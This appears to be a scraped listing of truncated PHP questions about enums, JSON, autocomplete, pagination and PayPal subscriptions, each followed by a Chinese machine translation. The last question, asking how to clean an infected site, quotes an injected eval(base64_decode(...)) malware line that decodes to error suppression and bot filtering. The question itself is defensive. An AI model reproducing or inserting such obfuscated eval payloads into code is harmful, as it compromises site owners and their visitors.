Does PHP have structs or enums and if not what is the best implementation for them?

This question already has an answer here: PHP and Enumerations 35 answers I actually created my own kind of enum for PHP and it works just fine for what i need to do. no typedefs but its nice :D Function enum($array, $asBitwise = false) /* * I formed another version that includes typedefs * but seeing how this hacky is not viewed as compliant * with programming stand


这个问题在这里已经有了答案: PHP和枚举35答案 我实际上为PHP创建了自己的枚举类型,对于我需要做的事情,它工作得很好。 没有typedefs但很好:D 函数枚举($ array,$ asBitwise = false) /* * I formed another version that includes typedefs * but seeing how this hacky is not viewed as compliant * with programming standards I won't post it unless someone * wishes to reques

Data migration with PHP

This question already has an answer here: How do I get a YouTube video thumbnail from the YouTube API? 29 answers $link = ''; Now match if the URL is a valid Youtube Link by matching it with Pattern. $ypattern= "#([-|~_0-9A-Za-z]+)|watch?v=([-|~_0-9A-Za-z]+)&?.*?)#"; if(preg_match_all($ypattern,$link, $outp


这个问题在这里已经有了答案: 如何从YouTube API获取YouTube视频缩略图? 29个答案 $ link =''; 如果网址是有效的Youtube链接,则匹配它即可匹配。 $ypattern= "#([-|~_0-9A-Za-z]+)|watch?v=([-|~_0-9A-Za-z]+)&?.*?)#"; if(preg_match_all($ypattern,$link, $output)) { foreach ($output[4] AS $video_id) { Youtube

How do I iterate over a JSON array using jQuery/AJAX call from PHP?

Possible Duplicate: Loop through Json object I have a PHP function, data.php , which fetches JSON data from an external server URL like such: <?php $url = ""; $content = file_get_contents($url); echo json_encode($content); ?> The JSON array retrieved looks like the following: [ { "name": "Not configured", "mac_address": "1111c11c1111"

如何使用PHP中的jQuery / AJAX调用遍历JSON数组?

可能重复: 循环浏览Json对象 我有一个PHP函数data.php ,它从外部服务器URL中获取JSON数据,如下所示: <?php $url = ""; $content = file_get_contents($url); echo json_encode($content); ?> 检索到的JSON数组如下所示: [ { "name": "Not configured", "mac_address": "1111c11c1111", "online": "false", "rate": "Not configured" }, { "

Zend Framework autocomplete

I have problem with autocomplete. My jQuery version is 1.11.0.min, jquery ui is 1.9.1.min and ajax autocomplete for jQuery is 1.2.7. That is my jquery code: $(function () { $('.client').autocomplete({ source: 'ajax/getusers', minLength: 2, onSelect: function (suggestion) { } });


我有自动完成问题。 我的jQuery版本是1.11.0.min,jquery ui是1.9.1.min,jQuery的ajax自动完成是1.2.7。 这是我的jQuery代码: $(function () { $('.client').autocomplete({ source: 'ajax/getusers', minLength: 2, onSelect: function (suggestion) { } }); }); 这是我的ajax / getuser

paginated api request, how to know if there is another page?

I am creating a PHP class that use a 3rd party API. The API has a method with this request URL structure: Where "x" is the page number. Each page return 50 sales and I need to return an undefined number of pages for each user (depending on the user sales) and store some data from each sale. I have already created some methods that get the


我正在创建一个使用第三方API的PHP类。 该API有一个包含这个请求URL结构的方法: 其中“x”是页码。 每个页面返回50个销售额,我需要为每个用户返回未定义数量的页面(取决于用户的销售额),并存储每笔销售的一些数据。 我已经创建了一些从URL获取数据的方法,解码并创建一个包含所需数据的新数组,但仅限第一个页面请求。 现在我想创建一个方法来检查是否有另一个页面,如果

PayPal Subscription and IPN

NOTE Why was this question closed? I propose openning it. It asks technical questions about PayPal. The fact it does not have code is irrelevant in this case, becuase answers to this question do help developers in PayPal subscriptions. The questions I am asking are not documented properly in PayPal, and even one of the answeres that was referenced in my question does state that the PayPal d


注意 为什么这个问题关闭了? 我建议打开它。 它询问有关PayPal的技术问题。 它没有代码的事实在这种情况下是无关紧要的,因为这个问题的答案确实有助于PayPal订阅中的开发人员。 我询问的问题没有在贝宝中正确记录,甚至在我的问题中引用的一个回答也说明PayPal文档并不好。 它是基于“太宽泛”而关闭的,但问题非常具体。 我希望它不是为了关闭它而关闭的,因为它与你的典型问题有所不同。 关于PayPal订阅和IPN我有几

API functions to use as replacement for subscription

I have a website coded in PHP that uses paypal buttons/IPN for subscriptions. The method is limited and I need to replace it with the REST-API. What the system needs to do: Accept new user recurring-payment subscriptions Be able to change plan pricing for new users Be able to change plan pricing for existing users Change subscription plans mid-subscription(If a user upgrades from pro


我有一个使用paypal按钮/ IPN进行订阅的PHP编码网站。 该方法是有限的,我需要用REST-API替换它。 系统需要做什么: 接受新用户定期付款订阅 能够更改新用户的计划定价 能够更改现有用户的计划定价 更改订阅计划中间订阅(如果用户从专业版升级到主版,价格会上涨,反之则下降)。 套餐之间的价格差异是5美元 给予有限数月的定期折扣。 问题: 1.)什么是PHP-API或REST-API中的定期付款的等价物? (我宁愿

Paypal recurring payment gateway modify subscription

I am using Paypal recurring payment gateway to make a subscription of certain amount per month using PHP in Yii. i dont have any Yii pre built extension so i created my own extension for Paypal recurring payment gateway and its working great. I am doing this by createrecurringprofile() function of paypal with Express checkout API. On first sign up, user needs to select one subscription pack


我使用Paypal循环支付网关在Yii中使用PHP每月订购一定数量的订阅。 我没有任何Yii预先建立的扩展,所以我创建了自己的扩展贝宝定期支付网关和它的工作很好。 我通过paypal的createrecurringprofile()函数使用Express checkout API执行此操作。 首次注册时,用户需要从4个包中选择一个订购包,登录后他/她可以更新其订购。 我的问题是,如果用户使用黄金订阅(软件包名称)软件包注册24美元金额。 而现在他/她只想在10

Several questions about paypal pro subscriptions flow

I have integrated standard paypal with one of sites and it works as follows: user selects which subscription to buy, he is redirected to paypal, paypal sends IPN response, I process it and then every X days PayPal sends a new IPN notifying site that user has been successfully charged for new subscription iteration. Now the problem is that user needs to have paypal account to sign up for such sub


我已将标准PayPal与一个网站集成,其工作原理如下:用户选择要购买的订阅,他被重定向到PayPal,PayPal发送IPN响应,我处理它,然后每X天PayPal发送一个新的IPN通知站点,该用户已成功收取新的订阅迭代。 现在的问题是,用户需要有PayPal账户来注册这样的订阅。 客户联系了贝宝并发现,当卖家使用贝宝专业账户时,有可能避免用户使用他们的贝宝账户来购买订阅。 这是真的吗? 我能否收集用户的信用卡信息,然后向PayPal API

How to get rid of eval

My site (very large community website) was recently infected with a virus. Every index.php file was changed so that the opening php tag of these files it was changed to the following line: <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV


我的网站(非常大的社区网站)最近感染了病毒。 每个index.php文件index.php更改,以便将这些文件的开头php标记更改为以下行: <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3Z